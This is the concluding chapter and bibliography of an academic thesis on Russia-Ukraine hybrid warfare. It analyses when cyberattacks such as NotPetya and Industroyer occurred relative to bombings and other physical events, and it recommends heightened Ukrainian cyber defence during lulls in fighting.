Bombings occurring and when a cyberattack takes place. This, coupled with the knowledge gained from the Axelrod-Iliev equation calculations, can assist smaller states in making educated inferences and allocating resources to best protect systems. While this thesis focused on Ukraine and the Ukrainian Russian relationship, similar analysis is possible on other hybrid wars between two unbalanced states.
With cyber a growing concern for states, and for the international community, definitions and power struggles hamper forward movement in collaboration and cooperation. The lack of definitions is important in the cyber domain as it allows the use of the Internet as a military tool with little legal repercussions. Clear distinctions were made, based on previous academic work and state governmental documents between cyberattack, information warfare, cyber espionage, cyber warfare, cybercrime and hybrid warfare. Definitions firmly remain in domestic legislation and are lacking throughout international legislation. As a result, it is evident that each definition is specifically made to fit the need of the state. It is through legislation and definitions that states allow themselves to partake in cyberattacks. It is through legislation and definitions that states protect themselves from international repercussions of utilizing a cyberattack.
Larger states that hold greater power can more readily control the cyber domain and influence future advancements in and legislation about cyber. Thus, smaller states are at a 126
disadvantage when in contention with a larger state. This power in cyber comes from infrastructure, legislation and funding around cyber and the advancement of new cyber technologies. A comparison between United States, Russian and Ukrainian power surrounding cyber infrastructure, legislation and funding is presented to further convey the need for alternative approaches to hybrid warfare. A smaller state is unable to compete with larger states that vie for dominance in this domain. By understanding the relationship between physical attributes and cyber attributes in hybrid warfare, the gap between larger and smaller states in infrastructure, legislation and funding can be minimized.
Ukraine is used as the case study to analyze the interplay of cyber attributes and physical attributes in hybrid war. The tumultuous Ukrainian Russian relationship before, during and after the Maidan Revolution, Annexation of Crimea and War in Donbas all lend well to analyze hybrid warfare within an ongoing conflict that has both a strong cyber and physical aspect. Another key aspect of the case study was the aggressive relationship between a larger state, powerful in cyber technology and infrastructure, able to vie for their own interests on the international stage, and rich in resources, including money, and a smaller state, weak in cyber technology and infrastructure, largely absent from the international stage, poor in resources, and lack funds for cyber development. Russia and Ukraine fit the dichotomy of a larger adversary state and a smaller victim state.
Russian influence in Ukraine is historical as they have been similar culturally, socially and linguistically. This has led the larger state, Russia, to assume a continued partnership based on past alliances and interactions. Historic and linguistic similarities cause Russia to view Ukraine as a beneficiary of Russian power, a sphere of influence that Russia identifies as historical Russian land. This Russian focus on Ukraine has meant that Russian influence over Ukraine did not 127
dissipate after the collapse of the Soviet Union. While it is evident that Ukraine aimed to join the
West in alliance, rather than Russia, Russian influence in the media, schooling, language and ideology is deeply rooted within Ukrainian society.
Five attacks were chosen to analyze due to their devastating nature and the role they play for Russia gaining advantage over Ukraine militarily, socially and structurally: Operation
Armagedon, X-Agent, BE3/KillDisk, CrashOverride/Industroyer and NotPetya. These five attacks were used to operationalize the Axelrod-Iliev equation. The equation was used to determine the optimal timing of a cyberattack using the specific attributes of the Ukrainian Crisis. Calculating
푇 = 2 to be true informs us that the optimal timing is during a lull in the risk of using the cyberattack.
If the Ukrainian government is aware that there is a higher likelihood of attack during a diversion of focus away from the Ukrainian Crisis, the government can be more prepared for increased activity. If there is a time the Ukrainian government will feel less vulnerable for any number of reasons, such as installing new defensive software, transitioning away from Soviet built infrastructure, a decline in fighting or a ceasefire negotiation, the government should, in turn, be on heightened alert for cyberattack. A cyberattack is still able to occur at any time in the Crisis but the most likely time a cyberattack will breach Ukrainian systems is during this downturn.
Assumptions that a downturn in fighting or a ceasefire are directly parallel to the decline in the use of cyber attacks is false. Cyberattacks employed during this lull are more likely to be successful, and Ukraine’s defense against cyberattacks should be on heightened alert while the fighting is quieter.
Statistical analysis of the data was done to discern relationship between the timing of cyberattack and the physical attributes on the ground. While the Axelrod-Iliev equation takes into 128
account physical attributes, it is impossible to pinpoint a specific physical attribute and its relationship with a cyberattack. For this reason, five data categories were chosen, Bombing, Open
Firing, Soldiers and Policemen Killed or Wounded, Civilians and Politicians Killed or Wounded, and Protests. It would be pleasing to conclude that there was a definitive correlation between a specific physical attribute and cyberattack, but this is not the case.
The relationship between Bombings and cyberattack and Open Firing and cyberattack were the most clearly defined. While no patterns are perfect correlations, the interplay of Bombings around each of the cyberattacks is a discernable pattern. This pattern suggests future research.
Bombing analysis should be conducted to include a more focused set of data, only incorporating bombings. While it is not a direct, provable correlation, further research could yet prove a stronger connection between the two. Open Firing and cyberattacks have a less definable trend than
Bombings. However, despite this, Open Firing has a potential for future research regarding the interplay of Bombings, Open Firing and cyberattacks. A more pointed study would need to be completed before any specific connections can be made, although Open Firing does rise slightly around the time of cyberattack.
The Ukrainian government should be aware that a lull in bombings is when there is a higher chance of a cyberattack being successfully. Assuming 푇 = 2, this makes logical sense, as there is a lull in the fighting, a feeling of confidence from the Ukrainian government, and a relaxing of defensive postures. However, should a downturn in bombings happen, cyber defenses should not assume that things are quiet on all fronts. It is during this time that it is optimal to use a cyberattack, meaning it is during this time that Ukrainian cyber defenses should be on high alert.
The other three categories lacked data or had spikes with little connection with other trends.
Trends in Military Personnel and Policemen Killed or Wounded and Civilians and Politicians 129
Killed or Wounded were difficult to gain insight from as the data sets were low in quantity and conclusions are likely to be misleading or faulty. Spikes in Deaths across both data sets suggests that deaths have a stronger connection to something other than cyberattacks. Protests were the least useful category. The data collected was sporadic and protests could easily be attributed to specific phenomenon entirely unrelated to cyberattacks. Further research about the correlation of protests and cyberattacks would be highly unlikely to produce any useful conclusions.
For the foreseeable future Ukrainian cyber capabilities will remain behind Russian cyber capabilities. However, by analyzing the data it is possible to discern when the optimal timing of cyberattack would take place and a pattern between Bombings, Open Firing and cyberattack.
While Ukraine is just one case study, understanding the interplay of physical and cyber attributes within hybrid warfare is a step forward in the attempts to combat hybrid warfare tactics, especially for states already at a disadvantage. As hybrid warfare becomes the war of the present, understanding its intricacies is important for the future of combating it, protecting from it and fighting back.
130
8 Bibliography
107th Congress. “Public Law 107-296: To Establish the Department of Homeland Security, and for other purposes.” 25 November 2002. https://www.dhs.gov/sites/default/files/publications/hr_5005_enr.pdf 99th Congress. H.R. 4718: Computer Fraud and Abuse Act of 1986. United States Congress: GPO, 1986. https://www.govtrack.us/congress/bills/99/hr4718/text/enr Ajir, Media and Bethany Vailliant. “Russian Information Warfare: Implications for Deterrence Theory.” Strategic Studies Quarterly 12, no. 3 (2018): 70-89. Andelman, David A. “US if waking up to the deadly threat of cyber war.” CNN, May 6, 2018. https://www.cnn.com/2018/05/06/opinions/opinion-andelman/index.html Australia LOAC Manual (2006). The Manual of the Law of Armed Conflict, Australian Defence Doctrine Publication 06.4. Australian Defence Headquarters: 11 May 2006. Defence Instructions (General) (2008). Axelrad, Elise T., Paul Sticha, Oliver Brdiczka and Jianqiang Shen. “A Bayesian Network Model for Predicting Insider Threats.” IEEE Security and Privacy Workshops (2013). Axelrod, Robert and Rumen Iliev. “Timing of Cyber Conflict” in Proceedings of the National Academy of Sciences of the United States of America 111, No. 4 (January 28, 2014) 1298- 1303. Azhar Unwala and Shaheen Ghori. “Brandishing the Cybered Bear: Information War and the Russia-Ukraine Conflict, Journal of the Military Cyber Professionals Association 1, No. 1 (2015); 1-11. Baezner, Marie and Patrice Robin. “Hotspot Analysis: Cyber and Information Warfare in the Ukrainian Conflict.” Center for Security Studies (CSS) (Zurich, June 2017). Ball, James. “How regular citizens got caught in the crossfire of a US-Russia cyberwar.” CNN, October 5, 2018. https://www.cnn.com/2018/10/05/opinions/citizens-in-the-crossfire-of- a-cyber-war-opinion-intl/index.html Benchea, Răzvan, Cristina Vatamanu, Alexandru Maximciuc and Victor Luncaşu. “APT28 Under the Scope: A Journey into Exfiltrating Intelligence and Government Information.” Bitdefender. 2015. Bilge, Leyla and Tudor Dumitras. “Before we Knew it: An Empirical Study of Zero-Day Attacks in the Real World.” CCS. North Carolina: Symantec Research Labs. October 2012. Brenner, Susan W. "'At Light Speed': Attribution and Response to cybercrime/terrorism/warfare." The Journal of Criminal Law and Criminology 97, 2 (2007); 379-475. Bukkvoll, Tor, Ukraine and European Security (London: A&C Black, 1997). 131
Bundeskanzlermat Österreich. Austrian Cyber Security Strategy, 2013. Vienna: Bundesministerium Für Inneres, 2013. Canada House of Commons. Canada’s Support to Ukraine In Crisis and Armed Conflict: Report of the Standing Committee on National Defence. Standing Committee on National Defence, 42nd Parliament, 1st Session. December 2017. Canada LOAC Manual (2001). The Law of Armed Conflict at the Operational and Tactical Levels. Office of the Judge Advocate General: 13 August 2001. Canada Use of Force Manual (2008). Use of Force for CF Operations, Canadian Forces Joint Publication. Chief of the Defence Staff, B-GJ-005-501/FP-001, August 2008. Carnegie Mellon University. “Software Engineering Institute: History,” Last updated 2018. https://www.sei.cmu.edu/about/divisions/cert/index.cfm#history Cherepanov, Anton. “Win32/Industroyer: A New Threat for Industrial Control Systems.” ESET. 12 June 2017. Chiwis, Christopher S. “Understanding Russian ‘Hybrid’ Warfare’ and what can be done about it.” RAND Corporation, March 22, 2017. Connell, Michael and Sarah Vogler. “Russia’s approach to Cyber Warfare.” CNA Occasional Paper Series. Naval Academy: Maryland. March 24,2017. Council of Europe. “Convention on Cybercrime,” European Treaty Series- No. 185. Budapest, 2001. “Criminal Code of Ukraine.” Verkhovna Rada: September 1, 2001. https://www.imolin.org/doc/amlid/Ukraine_Criminal%20Code%202001.pdf CrowdStrike Global Intelligence Team. “Use of FANCY BEAR Android Malware in Tracking of Ukrainian Field Artillery Units.” Published December 22, 2016. Updated March 23, 2017. Cyberwar. The Guardian. Last modified April 28, 2019. https://www.theguardian.com/technology/cyberwar Cyberwarfare. The New York Times. Last modified April 29, 2019. https://www.nytimes.com/topic/subject/cyberwarfare Danyk, Yuriy, Tamara Maliarchuk and Chad Briggs. “Hybrid War: High-tech, Information and Cyber Conflicts.” Connections: The Quarterly Journal 16, no. 2 (2017): 5-24. Ding, Shifei, Huajuan Huang and Ru Nie. “From Forecasting Method of Stock Price Based on Polynomial Smooth Twin Support Vector Regression.” In Intelligent Computing Theories, edited by Huang DS, Bevilacqua V., Figueroa J.C., and Premaratne P., Lecture Notes in Computer Science, Vol. 7995. Springer: Berlin, 2013. 132
Dragos Incorporated. “CRASHOVERRIDE: Analysis of the Threat to Electronic Grid Operations.” Published, 2017. https://dragos.com/blog/crashoverride/CrashOverride- 01.pdf Eilstrup-Sangiovanni, Mette. “Why the World Needs an International Cyberwar Convention,” Philosophy and Technology (2017). ESET. “En Route with Sednit: Part 2: Observing the Comings and Goings.” ESET White Papers. October 2016. "EuroMaidan rallies in Ukraine - Nov. 21-23 coverage." KyivPost. November 25, 2013. Accessed March 20, 2017. http://www.kyivpost.com/content/ukraine/euromaidan-rallies- in-ukraine-nov-21-23-coverage-332423.html. "EuroMaidan rallies in Ukraine (Feb. 19 live updates)." KyivPost. February 20, 2014. Accessed March 26, 2017. "EU-Ukraine Summits: 16 Years of Wheel-Spinning." The Ukrainian Week. Accessed March 26, 2017. http://ukrainianweek.com/Politics/73494. Fitton, Oliver. “Cyber Operations and Gray Zones: Challenges for NATO.” Connections: The Quarterly Journal 15, no. 2 (2016): 109-119. Fox-Brewster, Thomas. “Is this Ukrainian Company the Source of the ‘NotPetya’ Ransomware Explosion?” Forbes.com, June 27, 2017. https://www.forbes.com/sites/thomasbrewster/2017/06/27/medoc-firm-blamed-for- ransomware-outbreak/#6ff990e173c8 Geiβ, Robin. "The Conduct of Hostilities in and via Cyberspace." Proceedings of the Annual Meeting (American Society of International Law) 104 (2010); 371-374. Giegerich, Bastian. “Hybrid Warfare and the Changing Character of Conflict.” Connections: The Quarterly Journal 2 (2016): 65-72. Gjelten, Tom. "Shadow Wars: Debating Cyber "disarmament'. World Affairs 173, 4(2010); 33- 42. Global Affairs Canada. Statistical Report on International Assistance 2015-2016. Last modified April 28, 2017. http://www.international.gc.ca/gac-amc/publications/odaaa-lrmado/sria- rsai-2015-16-d2.aspx?lang=eng Global Forum on Cyber Expertise, “Cybersecurity in Ukraine: National Strategy and International Cooperation,” 07 June 2017. https://www.thegfce.com/news/news/2017/05/31/cybersecurity-in-ukraine Goncharova, Olena, Oksana Grytsenko and Denys Krasnikov. “Ukraine finds itself at the epicenter of global cyber attack.” Kyiv Post, June 30, 2017. https://www.pressreader.com/ukraine/kyiv-post/20170630/281741269437161 Gostev, Alexander. “Agent.btz: A source of Inspiration?” Securelist. March 12, 2014. 133
Greenberg, Andy. “How an entire nation became Russia’s test lab for Cyber War.” Wired. June 20, 2017. https://www.wired.com/story/russian-hackers-attack-ukraine/ Greenberg, Andy. “Petya Ransomware Epidemic May be Spillover from Cyberwar.” Wired (28 June 2017). https://www.wired.com/story/petya-ransomware-ukraine/ Greenberg, Andy. “The White House Blames Russia for NotPetya, the ‘Most Costly Cyberattack in History.” Wired (15 February 2018). https://www.wired.com/story/white-house-russia- notpetya-attribution/ H.R. 1997. “Ukraine Cybersecurity Cooperation Act of 2017,” Senate of the United States, February 8, 2018. Harvard Law Review Association. “Responding to Terrorism: Crime, Punishment and War.” Harvard Law Review 15, No. 4 (2002): 1217-1238. Hathaway, Oona A., Rebecca Crook of, Philip Levitz, Haley NX, Aileen Nowlan, William Perdue and Julia Spiegel. "The Law of Cyber-Attacks." California Law Review 100, 4 (2012); 817-885. Hayden, Patrick M., David K. Woolrich and Katherine D. Sobolewski. “Providing Cyber Situational Awareness on Defense Platform Networks.” The Cyber Defense Review 2, No. 2 (2017): 125-140. Hayward, Ryan." Evaluating the" Imminence" of a cyber attack for purposes of anticipatory self- defense." Columbia Law Review 117, 2 (2017); 399-434. Herszenhorn, David. "Journalist Is Beaten in Latest Attack on Ukrainian Opposition." The New York Times. December 25, 2013. Accessed March 20, 2017. http://www.nytimes.com/2013/12/26/world/europe/ukraine.html. "How the separatists delivered Crimea to Moscow." Reuters. March 13, 2014. Accessed March 20, 2017. http://in.reuters.com/article/ukraine-crisis-russia-aksyonov- idINL6N0M93AH20140313. Hughes, Rex. "A Treaty for Cyberspace." International Affairs 86, 2 (2010); 523-541. Hultquist, John. “Sandworm Team and the Ukrainian Power Authority Attacks.” iSight. 11 January 2016. ICS-CERT. Cyber-Attack Against Ukrainian Critical Infrastructure. Alert (IR-ALERT-H-16- 056-01). Washington, D.C. (Original Release date: February 25, 2016). ICS-CERT. Ongoing Sophisticated Malware Campaign Compromising ICS (Update E). Alert (ICS-ALERT-14-281-01E). Washington D.C. December 10, 2014. Last revised December 9, 2016. InterFax Ukraine. "Ukraine's prosecutor general classifies self-declared Donetsk and Luhansk republics as terrorist organizations." KyivPost. May 16, 2014. Accessed March 26, 2017. https://www.kyivpost.com/article/content/war-against-ukraine/ukraines-prosecutor- 134
general-classifies-self-declared-donetsk-and-luhansk-republics-as-terrorist-organizations- 348212.html. International Committee of the Red Cross (ICRC). Customary International Humanitarian Law, 2005. Volume I: Rules. Accessed via https://ihl-databases.icrc.org/customary- ihl/eng/docs/v1_rul_rule145 International Committee of the Red Cross (ICRC). Protocol Additional to the Geneva Conventions of 12 August 1949, and relating to the Protection of Victims of International Armed Conflicts (Protocol I), 8 June 1977. Geneva. International Conferences (The Hague). Hague Convention (IV) Respecting the Laws and Customs of War on Land and Its Annex: Regulations Concerning the Laws and Customs of War on Land. 18 October 1907. International Court of Justice (ICJ), Legality of the Threat or Use of Nuclear Weapons, Advisory Opinion, 8 July 1996. The Hague: I.C.J. Reports, 1996. International Telecommunication Union (ITU). Global Cybersecurity Index 2017. 6 July 2017. Jabbour, Kamal and Major Jenny Poisson. “Cyber Risk Assessment in Distributed Information Systems.” The Cyber Defense Review 1, no. 1 (2016): 91-112. Jaganathan, Venkatesh, Priyesh Cherurveettil and Premapriya Muthu Sivashanmugam. “Using a Prediction Model to Manage Cyber Security Threats.” The Scientific World Journal 2015. Tamilnadu: Hindawi Publishing Corporation (2015). Joseph S. Nye Jr. “Nuclear Lessons for Cyber Security?” Strategic Studies Quarterly 5, No. 4 (2011); 18-38. Joyner, Christopher C. and Catherine Lotrionte. “Information Warfare as International Coercion: Elements of a Legal Framework,” EJIL 12, No. 5 (2001); 825-865. Jushkin, Vladimir. “What is Hidden in Russia’s Military Budget?” Stockholm International Peace Research Institution, May 25, 2018. https://icds.ee/what-is-hidden-in-russias- military-budget/ Karatnycky, Adrian and Alexander J. Motyl. "The Key to Kiev: Ukraine's Security Means Europe's Stability." Foreign Affairs 88, no. 3 (2009): 106-20. Karatnycky, Adrian. “Ukraine’s Orange Revolution”. Foreign Affairs 84, no. 2 (2005) p. 35-52. Kenya LOAC Manual (1997). Law of Armed Conflict, Military Basic Course (ORS), 4 Précis. The School of Military Police. Koval, Nikolay. “Revolution Hacking,” in Cyber War in Perspective: Russian Aggression against Ukraine, Edited by Kenneth Geers. NATO CCDCDE Publications. (Tallinn: 2015); 55-58. 135
Kriendler, John, “Ukrainian Membership in NATO: Benefits, Costs and Challenges,” Defence Academy of the United Kingdom: European Center for Security Studies Occasional Paper Series, no 12 (July 2007). Kyiv Post. “Two arrests reported in Chornovol beating (videos)(updated).” Kyiv Post, December 25, 2013. https://www.kyivpost.com/article/content/ukraine-politics/journalist-and- protest-activist-chornovol-beaten-near-kyiv-334224.html, Lee, Robert, Michael J. Assante and Tim Conway. “TLP: White Analysis of the Cyber Attack on the Ukrainian Power Grid: defense Use Case.” Washington D.C.: SANS E-ISAC. March 18, 2016. Leyden, John. “US Army bans USB devices to contain worm.” The Register (20 November 2008). http://www.theregister.co.uk/2008/11/20/us_army_usb_ban/ Liang, Qiao and Wang Xiangsui. Unrestricted Warfare. Beijing: PLA Literature and Arts Publishing House, 1999. Libicki, Martin. “The Cyber War that Wasn’t,” in Cyber War in Perspective: Russian Aggression against Ukraine. Edited by Kenneth Geers. NATO CCDCDE Publications. Tallinn: 2015. pp. 49-54. LogRhythm Labs. “Detecting Petya/NotPetya Ransomware.” LogRhythm (27 June 2017). https://logrhythm.com/blog/detecting-petya-notpetya-ransomware/ Lookingglass Cyber Threat Intelligence Group. “Operation Armageddon: Cyber Espionage as a Strategic component of Russian Modern Warfare.” April 28, 2015. Lynn III, William J. “Defending a New Domain: The Pentagon’s Cyberstrategy.” Foreign Relations 89, No. 5 (2010); 97-108. Mao Zedong. On Guerrilla Warfare. Washington D.C.: Department of the Navy, 1989. “Marching off to cyberwar.” The Economist. May 6, 2009. Accessed on September 12, 2018. https://www.economist.com/technology-quarterly/2008/12/06/marching-off-to-cyberwar Mathews, Lee. “Ransomware Attack Cost Shipping Giant Maersk Over 200 Million.” Forbes, 16 August 2017. https://www.forbes.com/sites/leemathews/2017/08/16/notpetya- ransomware-attack-cost-shipping-giant-maersk-over-200-million/#71b0f5574f9a McGuinness, Damien. “How a cyber attack transformed Estonia.” BBC, April 27, 2017. https://www.bbc.com/news/39655415 MEDoc. June 27, 2017. https://www.facebook.com/medoc.ua/posts/1904044929883085 Morel, Benoit. Cyber Insecurity. Page Publishing Inc. (2017) Multinational Capability Development Campaign. Defining Hybrid Warfare. Countering Hybrid Warfare Project, January 2017. 136
Nakashima, Ellen. “Russian military was behind ‘NotPetya’ cyberattack in Ukraine, CIA concludes.” The Washington Post, January 12, 2018. National Computer Security Agency. Trusted Product Evaluation: A Guide for Vendors (Washington D.C.: GPO, 1990). National Defence and Security Council. “National Security Strategy of Ukraine.” Accessed through http://www.niss.gov.ua/public/File/2015_analit/strategiya_2015.pdf NATO Cooperative Cyber Defence Centre of Excellence. Tallinn Manual on the International Law Applicable to Cyber Warfare, 2013. Edited by Michael N. Schmitt. Tallinn, Cambridge Press, 2013. Newman, Lily Hay. “The Leaked NSA Spy Tool that Hacked the World.” Wired, March 7, 2018. https://www.wired.com/story/eternalblue-leaked-nsa-spy-tool-hacked-world/ North Atlantic Treaty Organization. NATO Glossary of Terms and Definitions: AAP-06 Edition 2014. Warsaw: NATO Standardization Agency, 2014. Norway Medical Services Directive (2009). Directive on Compliance with Certain International Law Obligations concerning the Medical Services. Chief of Defence: Defence Staff Norway, 1 May 2009. “On Fundamentals of National Security of Ukraine,” No. 964-IV with changes introduced by Laws N 3200-IV of 15.12.2005, N 3411-VI of 01.07.2010. Accessed via https://www.dcaf.ch/sites/default/files/publications/documents/Book_LAW- engl_PRESS.pdf “On the Legal Regime of Martial Law,” 1647-III including changes made by No. No 662-IV of 03.04.2003, BVR, 2003, No 27, p. 209; No. 803-VI of 25.12.2008, BVR, 2009, No 19, p. 258; No. 1836-VI of 21.01.2010, BVR, 2010, No 12, p. 119; No. 2592-VI of 07.10.2010, BVR, 2011, No 10, p. 63. Accessed via https://www.dcaf.ch/sites/default/files/publications/documents/Book_LAW- engl_PRESS.pdf “On the National System of Confidential Communication,” 2919 II I of 10.01.2002 including changed made by No. 1280-IV of 18.11.2003, BVR, 2004, No. 12, p. 155; No 2599-IV of 31.05.2005, ВVR, 2005, N 26, p. 349; No 879-VI of 15.01.2009, ВVR, 2009, N 24, p. 296. Kyiv, Ukraine: 2002. Accessed via https://www.dcaf.ch/sites/default/files/publications/documents/Book_LAW- engl_PRESS.pdf Osborne, Charlie. “NotPetya ransomware forced Maersk to reinstall 4000 servers, 45000 PCs.” Zdnet.com, January 26, 2018. https://www.zdnet.com/article/maersk-forced-to-reinstall- 4000-servers-45000-pcs-due-to-notpetya-attack/ 137
Owens, William A. Kenneth W. Dam, Herbert S Lin, Constance F. Citro and Margaret E. Martin. “Technology, Policy, Law and Ethics Regarding U.S. Acquisition and Use of Cyberattack Capabilities.” National Academies Press: 2009. 162. Porche III, Isaac R., Jerry Sollinger and Shawn Mckay. A Cyberworm that Knows No Boundaries. RAND Corporation (2011). Porche III, Issac R., Christopher Paul, Michael York, Chad C. Serena, Jerry M. Sollinger, Elliot Axelband, Endy Y. Min and Bruce J. Held. Redefining Information Warfare Boundaries for an Army in a Wireless World. RAND Corporation. 2013. Presidential Decree of Ukraine. “Cyber Security Strategy of Ukraine,” No. 96/2016. 15 March 2016. Pridham, Geoffrey. “Time to Bolster the Baltic States.” The World Today 71, no. 4 (2015): 40- 41. Producing, Operating and supporting a 5th Generation Fighter. Lockheed Martin. Last modified 2019. https://www.f35.com/about/cost "Raw video footage of Ukraine EuroMaidan protesters gunned down in Kiev by snipers." YouTube. February 22, 2014. Accessed March 19, 2017. https://www.youtube.com/watch?v=gsRPEXxI2dk. Raymond, Mark. “Engaging Security and Intelligence Practitioners in the Emerging Cyber Regime Complex.” The Cyber Defense Review 1, no. 2 (2016): 81-94. Renatus, Flavius V. “De Re Militari.” Edited and Translated by John Clarke. Digital Attic. www.digitalattic.org/home/war/vegetius/. Roger C. Molander, Andrew S. Riddle and Peter A. Wilson. Strategic Information Warfare: The New Face of Warfare. RAND Corporation. 1996. Rouse Margaret. “National Computer Security Center (NCSC).” Securesearch (April 2010). https://searchsecurity.techtarget.com/definition/National-Computer-Security-Center Rudomsky, Ruslan. “Как изменились Вооруженные силы Украины за 25 лет?” Depo News, June 6, 2016. https://www.depo.ua/rus/war/yak-zminilis-zbroyni-sili-ukrayini-za-25- rokiv-06122016110000 “Russia among top 5 countries with highest cyber security budget.” Sputnik News. October 1, 2017. https://sptnkne.ws/dm32 SBU Press Center. “SBU exposes the Russian origin of recent hacker attacks on government infrastructure information systems.” SBU News, December 30, 2017. https://ssu.gov.ua/en/news/1/category/1/view/4250#.jRADsgAt.dpbs SBU Press Centre. “Russian Hackers plan energy subversion in Ukraine.” 28 December 2015. Accessed 15 March 2018. https://www.ukrinform.net/rubric-crime/1937899-russian- hackers-plan-energy-subversion-in-ukraine.html# 138
Schnaufer II, Tad A. “Redefining Hybrid Warfare: Russia’s Non-linear War Against the West.” Journal of Strategic Studies 10, no. 1 (2017): 17-31. Security Assistance Monitor at the Center for International Policy. Ukraine Security Assistance Initiative. Last modified April 29, 2019. securityassistance.org/content/Ukraine%20security%20assistance%20initiative Shamir, Udi “Analyzing a New Variant of BlackEnergy3: Likely Insider Based Execution.” SentinelOne. 26 January 2016. “Stand-off over 'tortured' Ukrainian activist Dmytro Bulatov." BBC News. January 31, 2014. Accessed October 18, 2017. http://www.bbc.com/news/world-europe-25988661 Solis, Gary, D. The Law of Armed Conflict: International Humanitarian Law in War. New York: Cambridge University Press, 2016. Sood, Karan and Shaun Hurley. “NotPetya Technical Analysis- A Triple Threat: File Encryption, MFT Encryption , Credential Theft.” CrowdStrike, June 29, 2017. https://www.crowdstrike.com/blog/petrwrap-ransomware-technical-analysis-triple-threat- file-encryption-mft-encryption-credential-theft/ State Statistic Service of Ukraine, Population of Ukraine 2014, Demographic Yearbook (Kyiv, Ukraine, 2015) ed. H.M. Tymoshenko, http://database.ukrcensus.gov.ua/PXWEB2007/popul_eng.htm (accessed Nov. 28, 2016). State Statistics Service of Ukraine. Number and Composition Population of Ukraine by data All- Ukrainian Census 2001, (Kyiv, Ukraine, 2001) http://2001.ukrcensus.gov.ua/eng/results/general/nationality/ (accessed 22 October 2017). Stout, Kristie Lu. “Cyber Warfare: Who is China hacking now?” CNN, September 29, 2016. https://www.cnn.com/2016/09/29/asia/china-cyber-spies-hacking/index.html Streltsov, Leo. “The System of Cybersecurity in Ukraine: Principles, Actors, Challenges, Accomplishments.” Eur J Secur Res 2 (2017); 147-184. Suiche, Matt. “Petya.2017 is a wiper not a ransomware.” Comae Technologies, June 28, 2017. https://blog.comae.io/petya-2017-is-a-wiper-not-a-ransomware-9ea1d8961d3b Sweden IHL Manual (1991). International Humanitarian Law in Armed Conflict, with reference to the Swedish Total Defence System. Swedish Ministry of Defence, January 1991. Thomas Rid. “Cyber War Will Not Take Place,” Journal of Strategic Studies 35, No. 1 (2012); 5-32. "Ukraine activist Chornovol's beating causes outrage." BBC News. December 25, 2013. Accessed March 22, 2017. http://www.bbc.com/news/world-europe-25515838. "Ukraine crisis: Timeline." BBC News. November 13, 2014. Accessed March 18, 2017. http://www.bbc.com/news/world-middle-east-26248275. 139
"Ukraine Maidan deaths: Who fired shots?" BBC News. Accessed March 20, 2017. http://www.bbc.com/news/world-europe-31435719. "Ukraine opposition activist Dmytro Bulatov says kidnappers "crucified" him, cut up ears and face." CBS News. January 31, 2014. Accessed March 21, 2017. http://www.cbsnews.com/news/ukraine-opposition-activist-dmytro-bulatov-says- kidnappers-crucified-him/. "Ukraine protests after Yanukovych EU deal rejection." BBC News. November 30, 2013. Accessed March 17, 2017. http://www.bbc.com/news/world-europe-25162563. Ukraine Interactive Map. Live Universal Awareness Map. Last modified April 30, 2019. https://liveuamap.com UNIAN. “Ukraine Create National Center for Cybersecurity,” 08 June 2016. https://www.unian.info/society/1369157-ukraine-creates-national-center-for-cyber- security.html United Nations Conference on International Organization. Charter of the United Nations and Statute of the International Court of Justice. San Francisco: 26 June 1945. United Nations. Convention on the Prohibition of the Use, Stockpiling, Production and Transfer of Anti-Personnel Mines and on Their Destruction. Ottawa: 1997. United States Congress. Federal Information Security Modernization Act (FISMA), Public Law No: 113-283. 18 December 2014. (Congress: GPO, 2014). United States Department of Defense. Department of Defense Law of War Manual, June 2015. Washington D.C.: GPO, December 2016. United States Department of Defense. Department of Defense Trusted Computer System Evaluation Criteria (DoD 5200.28-STD) (Washington D.C.: GPO, 1985). United States Department of Defense. United States Department of Defense Dictionary of Military and Associated Terms, February 2018. Washington D.C.: GPO, 2018. http://www.jcs.mil/Portals/36/Documents/Doctrine/pubs/dictionary.pdf United States Department of Homeland Security. Section 630 of the Consolidated Appropriations Act, 2017 (Pub. L. No. 115-31) amended 31 U.S.C. § 1105 (a) (35). Washington, DC: GPO, 2018. https://www.whitehouse.gov/wp- content/uploads/2018/02/ap_21_cyber_security-fy2019.pdf USAID, U.S. Overseas Loans and Grants: Obligations and Loan Authorizations, July 1, 1945- September 30, 2016. Washington DC: GPO, 2016. 178 US-CERT. “About Us.” Last updated 30 September 2016. https://www.us-cert.gov/about-us US-CERT. CrashOverride Malware. Alert (TA17-163A). Washington D.C., (Original release date: June 12, 2017. Revision date: July 27, 2017). 140
Valerino, Brandon and Ryan C. Maness. "The Dynamics of Cyber Conflict between Rival Antagonists, 2001-11." Journal of Peace Research 51, 3(2014); 347-360. Verkhovna Rada of the Ukrainian SSR, Deceleration of State Sovereignty of Ukraine (Kyiv, Ukraine, July 16, 1990) (accessed Nov. 28, 2018). Verkhovna Rada, Constitution of Ukraine (Kyiv, Ukraine, 28 June 1996) (accessed Nov. 28, 2018). Weinberg, Jonathan. “ICANN and the problem of Legitimacy.” Duke Law Journal 50, 1 (2000): 187-260. “What are the Minsk agreements?" The Economist. September 13, 2016. Wu, Jinyu, Lihua Yin and Yunchuan Guo. “Cyber Attacks Prediction Model Based on Bayesian Network.” IEEE Security and Privacy Workshops (2012). Yannakogeoros, Panayotis A. “Internet Governance and National Security.” Strategic Studies Quarterly 6, no. 3 (2012): 102-125. Young, Donna M. “A Graphic Organizer for Polynomial Functions.” The Mathematics Teacher 106, No. 2 (Sept. 2012): 160-162. “Z Table.” University of Florida. http://www.stat.ufl.edu/~athienit/Tables/Ztable.pdf Zetter, Kim., “The Ukrainian Power Grid Was Hacked Again.” Vice News. 10 January 2017. Accessed 18 March 2018. https://motherboard.vice.com/en_us/article/bmvkn4/ukrainian- power-station-hacking-december-2016-report Арсеній Яценюк to "Народне віче за європейську Україну” Event on Public Facebook, November 24, 2013. https://www.facebook.com/events/501502656623561/ "Автомайдан. Хто ми?" Автомайдан. Хто ми? Accessed March 24, 2017. http://www.automaidan.org.ua/aboutus.html. “Бюджет России на 2018 год: чем будут наполнять и на что тратить.” Деловая жизнь bs- life.ru, December 1, 2018. http://bs-life.ru/makroekonomika/budzet2018.html “Що таке "Правий сектор"?" ПРАВИЙ СЕКТОР. Accessed March 26, 2017. http://pravyysektor.info/about.html.
141
Tables
